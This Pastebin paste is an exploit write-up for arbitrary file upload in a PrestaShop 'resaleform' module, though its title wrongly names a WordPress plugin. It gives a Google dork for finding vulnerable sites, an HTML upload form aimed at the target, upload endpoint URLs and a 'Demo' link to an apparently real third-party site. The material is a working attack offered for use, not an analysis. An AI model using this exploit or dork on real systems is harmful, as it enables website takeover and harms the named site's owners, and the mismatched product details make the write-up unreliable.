Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Wordpress Plugin WP-Symposium Arbitrary File Upload
- # Google Dork: inurl:/module/resaleform/
- # Date: 16/07/2016
- # Software Link: http://addons.prestashop.com/en/6967-reseller.html
- # Version: Any Version
- # Tested on: Windows, Linux
- # Author : AnoaGhost
- Exploit CSRF :
- <form method="post" action="http://site.com/path/" enctype="multipart/form-data">
- <input type="file" name="upl"/>
- <input type="submit"></input></input></form>
- Poc :
- http://site.com/path/module/resaleform/default?action=add_file
- http://site.com/path/module/resaleform/upload.php
- Demo ?
- http://apress24.pl/modules/resaleform/
Add Comment
Please, Sign In to add comment